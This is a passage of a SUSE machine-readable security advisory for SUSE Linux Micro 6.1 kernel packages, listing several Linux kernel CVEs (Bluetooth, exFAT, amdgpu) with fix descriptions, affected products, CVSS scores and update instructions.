"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40280",
"url": "https://www.suse.com/security/cve/CVE-2025-40280"
},
{
"category": "external",
"summary": "SUSE Bug 1254847 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "external",
"summary": "SUSE Bug 1254951 for CVE-2025-40280",
"url": "https://bugzilla.suse.com/1254951"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40280"
},
{
"cve": "CVE-2025-40282",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40282"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: 6lowpan: reset link-local header on ipv6 recv path\n\nBluetooth 6lowpan.c netdev has header_ops, so it must set link-local\nheader for RX skb, otherwise things crash, eg. with AF_PACKET SOCK_RAW\n\nAdd missing skb_reset_mac_header() for uncompressed ipv6 RX path.\n\nFor the compressed one, it is done in lowpan_header_decompress().\n\nLog: (BlueZ 6lowpan-tester Client Recv Raw - Success)\n------\nkernel BUG at net/core/skbuff.c:212!\nCall Trace:\n\u003cIRQ\u003e\n...\npacket_rcv (net/packet/af_packet.c:2152)\n...\n\u003cTASK\u003e\n__local_bh_enable_ip (kernel/softirq.c:407)\nnetif_rx (net/core/dev.c:5648)\nchan_recv_cb (net/bluetooth/6lowpan.c:294 net/bluetooth/6lowpan.c:359)\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40282",
"url": "https://www.suse.com/security/cve/CVE-2025-40282"
},
{
"category": "external",
"summary": "SUSE Bug 1254850 for CVE-2025-40282",
"url": "https://bugzilla.suse.com/1254850"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40282"
},
{
"cve": "CVE-2025-40283",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40283"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: btusb: reorder cleanup in btusb_disconnect to avoid UAF\n\nThere is a KASAN: slab-use-after-free read in btusb_disconnect().\nCalling \"usb_driver_release_interface(\u0026btusb_driver, data-\u003eintf)\" will\nfree the btusb data associated with the interface. The same data is\nthen used later in the function, hence the UAF.\n\nFix by moving the accesses to btusb data to before the data is free\u0027d.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40283",
"url": "https://www.suse.com/security/cve/CVE-2025-40283"
},
{
"category": "external",
"summary": "SUSE Bug 1254858 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "external",
"summary": "SUSE Bug 1254859 for CVE-2025-40283",
"url": "https://bugzilla.suse.com/1254859"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40283"
},
{
"cve": "CVE-2025-40284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: MGMT: cancel mesh send timer when hdev removed\n\nmesh_send_done timer is not canceled when hdev is removed, which causes\ncrash if the timer triggers after hdev is gone.\n\nCancel the timer when MGMT removes the hdev, like other MGMT timers.\n\nShould fix the BUG: sporadically seen by BlueZ test bot\n(in \"Mesh - Send cancel - 1\" test).\n\nLog:\n------\nBUG: KASAN: slab-use-after-free in run_timer_softirq+0x76b/0x7d0\n...\nFreed by task 36:\n kasan_save_stack+0x24/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3a/0x60\n __kasan_slab_free+0x43/0x70\n kfree+0x103/0x500\n device_release+0x9a/0x210\n kobject_put+0x100/0x1e0\n vhci_release+0x18b/0x240\n------",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40284",
"url": "https://www.suse.com/security/cve/CVE-2025-40284"
},
{
"category": "external",
"summary": "SUSE Bug 1254860 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "external",
"summary": "SUSE Bug 1257669 for CVE-2025-40284",
"url": "https://bugzilla.suse.com/1257669"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40284"
},
{
"cve": "CVE-2025-40287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40287"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix improper check of dentry.stream.valid_size\n\nWe found an infinite loop bug in the exFAT file system that can lead to a\nDenial-of-Service (DoS) condition. When a dentry in an exFAT filesystem is\nmalformed, the following system calls - SYS_openat, SYS_ftruncate, and\nSYS_pwrite64 - can cause the kernel to hang.\n\nRoot cause analysis shows that the size validation code in exfat_find()\ndoes not check whether dentry.stream.valid_size is negative. As a result,\nthe system calls mentioned above can succeed and eventually trigger the DoS\nissue.\n\nThis patch adds a check for negative dentry.stream.valid_size to prevent\nthis vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40287",
"url": "https://www.suse.com/security/cve/CVE-2025-40287"
},
{
"category": "external",
"summary": "SUSE Bug 1255030 for CVE-2025-40287",
"url": "https://bugzilla.suse.com/1255030"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40287"
},
{
"cve": "CVE-2025-40288",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40288"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Fix NULL pointer dereference in VRAM logic for APU devices\n\nPreviously, APU platforms (and other scenarios with uninitialized VRAM managers)\ntriggered a NULL pointer dereference in `ttm_resource_manager_usage()`. The root\ncause is not that the `struct ttm_resource_manager *man` pointer itself is NULL,\nbut that `man-\u003ebdev` (the backing device pointer within the manager) remains\nuninitialized (NULL) on APUs-since APUs lack dedicated VRAM and do not fully\nset up VRAM manager structures. When `ttm_resource_manager_usage()` attempts to\nacquire `man-\u003ebdev-\u003elru_lock`, it dereferences the NULL `man-\u003ebdev`, leading to\na kernel OOPS.\n\n1. **amdgpu_cs.c**: Extend the existing bandwidth control check in\n `amdgpu_cs_get_threshold_for_moves()` to include a check for\n `ttm_resource_manager_used()`. If the manager is not used (uninitialized\n `bdev`), return 0 for migration thresholds immediately-skipping VRAM-specific\n logic that would trigger the NULL dereference.\n\n2. **amdgpu_kms.c**: Update the `AMDGPU_INFO_VRAM_USAGE` ioctl and memory info\n reporting to use a conditional: if the manager is used, return the real VRAM\n usage; otherwise, return 0. This avoids accessing `man-\u003ebdev` when it is\n NULL.\n\n3. **amdgpu_virt.c**: Modify the vf2pf (virtual function to physical function)\n data write path. Use `ttm_resource_manager_used()` to check validity: if the\n manager is usable, calculate `fb_usage` from VRAM usage; otherwise, set\n `fb_usage` to 0 (APUs have no discrete framebuffer to report).\n\nThis approach is more robust than APU-specific checks because it:\n- Works for all scenarios where the VRAM manager is uninitialized (not just APUs),\n- Aligns with TTM\u0027s design by using its native 